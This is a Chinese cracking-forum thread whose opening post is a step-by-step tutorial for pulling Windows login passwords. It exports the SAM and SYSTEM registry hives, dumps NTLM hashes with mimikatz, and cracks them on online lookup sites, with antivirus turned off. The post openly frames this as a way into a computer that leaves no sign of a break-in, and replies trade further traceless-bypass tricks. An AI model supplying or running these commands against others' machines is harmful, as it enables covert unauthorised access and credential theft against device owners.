吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 10297|回复: 195
上一主题 下一主题
收起左侧

[分享] Windows开机密码读取

    [复制链接]
跳转到指定楼层
楼主
icer233 发表于 2026-5-3 19:08 回帖奖励

Windows开机密码读取

0x00 前言

周知所众,现在想要绕过Windows的开机密码进入系统已经是非常简单了,网上各种教程层出不穷。无论是使用PE盘清除密码。还是通过替换粘滞键或是轻松使用打开命令行,操作难度都不大。

但是,这些方法都有些麻烦,且各有弊端。如果使用PE清除密码,势必会留下痕迹,别人就知道了有人破解过电脑了;如果每次都用PE盘备份、清除、恢复,那也实在是太麻烦了……

这样看来,如果能获得密码,那就最好不过了。


本教程使用场景:

  1. 能进入系统(比如他人帮助你解锁密码,当然PE盘也可以,只是操作麻烦一些,懂的人自然能做到)
  2. 有管理员权限,能使用注册表
  3. 能联网下载工具、使用在线工具
  4. 密码较为简单

0x01 工具列表

密码提取工具:mimikatz

开源地址:gentilkiwi/mimikatz: A little tool to play with Windows security

下载地址:Releases · gentilkiwi/mimikatz


解密工具

工具1:https://md5decrypt.net/en/Ntlm/

工具2:https://hashes.com/zh/decrypt/hash

工具3:https://cmd5.com/

这三个工具效果是一样的,可以任选其一使用。

0x02 操作流程

下载软件

  1. 从上面给出的网址中下载mimikatz工具,并解压。
  2. 打不开网址可以搜索相关“Github下载教程”。

复制注册表文件

  1. 找到mimikatz程序中对应系统位数的文件夹,如“x64”

  2. 以管理员身份运行cmd并进入上述目录

    解压出类的目录树应该如下

    mimikatz_trunk
    ├── kiwi_passwords.yar
    ├── mimicom.idl
    ├── README.md
    ├── x64
    │   ├── mimidrv.sys
    │   ├── mimikatz.exe
    │   ├── mimilib.dll
    │   └── mimispool.dll
    └── Win32
       ├── mimidrv.sys
       ├── mimikatz.exe
       ├── mimilib.dll
       ├── mimilove.exe
       └── mimispool.dll
    
  3. 依次在cmd中输入如下命令,将两个注册表文件复制到该目录

    reg save hklm\sam sam.hive
    reg save hklm\system system.hive
  4. 在cmd中运行 mimikatz 并解密,输入如下命令

    mimikatz.exe
    lsadump::sam /sam:sam.hive /system:system.hive
  5. 会输出一大堆内容,找到形如下面这样的内容(应该在输出内容的中篇下)

    RID  : 00000123 (1001)
    User : YourUsername
     Hash NTLM: 123abc456def123abc456def123abc45

    其中 User: 后面跟的是你的用户名,Hash NTLM: 后面跟的是你的密码的密文,复制这段字段

解密

  1. 打开提到的三个网站中的一个,如我使用工具2
  2. 输入复制的密文,输入验证码(如果有的话),点击按钮解密
  3. 如果能解出来,可能会有类似这样的输出:123abc456def123abc456def123abc45:password ; 冒号后面的就是你的密码了

0x03 结语

本教程能100%读取出经过NTLM加密过后的密码的Hash值,但是并不能保证能解密出明文(事实上只有小部分的能解密出来)。

另外请大家合法实用工具。

温馨提示:

  1. 本教程使用的工具 mimikatz 还支持内存读取SSP注入读取两个方案,但是不支持Windows11系统,故本教程仅介绍文件读取方案。
  2. 如果是PE系统的话,无法使用注册表导出(导出的不是原系统的密码文件),可以到你系统盘下的Windows/System32/config文件夹里复制出来后使用,cmd命令里的文件名自行改一下。
  3. 原本使用注册表导出密码文件,其实也可以直接把那两个文件从config里复制出来,然后用 mimikatz 读取
  4. 全程需要关闭杀毒软件使用。

免费评分

参与人数 55吾爱币 +44 热心值 +47 收起 理由
twomoon + 1 + 1 谢谢@Thanks!
xljh888 + 1 + 1 谢谢@Thanks!
fqdj20 + 1 谢谢@Thanks!
hdtkdy + 1 + 1 我很赞同!
浮尘晓梦 + 1 谢谢@Thanks!
wqifeng9511 + 1 + 1 我很赞同!
lyrong2008 + 1 热心回复!
5196 + 1 + 1 谢谢@Thanks!
大松树 + 1 + 1 谢谢@Thanks!
zj_tj + 1 + 1 热心回复!
CC大飞机 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
auv1 + 1 我很赞同!
开心熊猫741 + 1 + 1 谢谢@Thanks!
tangchenL + 1 用心讨论,共获提升!
yxpp + 1 谢谢@Thanks!
www2011ping + 1 谢谢@Thanks!
lina777 + 1 + 1 热心回复!
lettinglee + 1 我很赞同!
6898 + 1 热心回复!
wangli840701 + 1 我很赞同!
henryshao + 1 + 1 谢谢@Thanks!
hmb860428 + 1 谢谢@Thanks!
Tiniaual + 1 + 1 热心回复!
card628 + 1 热心回复!
Tulinzero + 1 + 1 谢谢@Thanks!
wanyimin + 1 我很赞同!
RRZFS + 1 + 1 谢谢@Thanks!
StoreDS + 1 谢谢@Thanks!
Shanghanzu + 1 + 1 我很赞同!
Ali2580 + 1 + 1 热心回复!
Rabbit1124 + 1 谢谢@Thanks!
zjdals + 1 + 1 我很赞同!
dl820321 + 1 + 1 谢谢@Thanks!
springlu + 1 我很赞同!
qjlfl + 1 + 1 用心讨论,共获提升!
weidechan + 1 用心讨论,共获提升!
shiyoufu + 1 + 1 我很赞同!
zhuar + 1 + 1 我很赞同!
waynewange + 1 谢谢@Thanks!
xinbo + 1 + 1 谢谢@Thanks!
chinawolf2000 + 1 + 1 热心回复!
shiyue2925 + 1 + 1 谢谢@Thanks!
无尘浪子 + 1 谢谢@Thanks!
小橙紫 + 2 + 1 学到了
jinliangyu + 1 + 1 谢谢@Thanks!
方大爷 + 1 + 1 用心讨论,共获提升!
laozhang4201 + 1 + 1 热心回复!
daoye9988 + 1 + 1 谢谢@Thanks!
1588 + 1 + 1 谢谢@Thanks!
IcePlume + 1 + 1 我很赞同!
lwj1367 + 1 + 1 谢谢@Thanks!
Issacclark1 + 1 谢谢@Thanks!
Micee + 1 + 1 热心回复!
蔷薇的羽翼 + 1 + 1 我很赞同!
gunxsword + 1 + 1 热心回复!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

推荐
Henglie 发表于 2026-5-4 00:59
需要跑破解和查彩虹表的还是太慢了。
无痕的办法还是进PE备份一下sam文件,然后直接清除密码进系统。结束之后还原会那个原本的sam文件,也是写一个bat脚本就可以做到的事情

免费评分

参与人数 3吾爱币 +4 热心值 +3 收起 理由
xiakor + 1 + 1 这个思路不错。
yanguichao + 1 + 1 对哦!
无闻无问 + 2 + 1 热心回复!

查看全部评分

推荐
chenjingguo2001 发表于 2026-5-3 19:29
推荐
乡间人 发表于 2026-5-3 20:29
推荐
SVIP9大会员 发表于 2026-5-3 20:44
fanvalen 发表于 2026-5-3 19:26
研究一下带bitlocker加密的怎么 搞密码

这个不可能的,不要想了
推荐
愚无尽 发表于 2026-5-3 19:49
不苦小和尚 发表于 2026-5-3 19:42
要是能100%无痕跳过密码验证就好了

一直都有的,只是你不知道。Kon-Boot了解一下。
沙发
fanvalen 发表于 2026-5-3 19:26
研究一下带bitlocker加密的怎么 搞密码
4#
不苦小和尚 发表于 2026-5-3 19:42
要是能100%无痕跳过密码验证就好了
6#
ningyil 发表于 2026-5-3 19:50
主板密码怎么破解  不知道那位大神有研究
7#
保温板 发表于 2026-5-3 20:14
太麻烦了
8#
ui99091231 发表于 2026-5-3 20:26
好玩,好用
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - 52pojie.cn ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2026-5-7 13:40

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表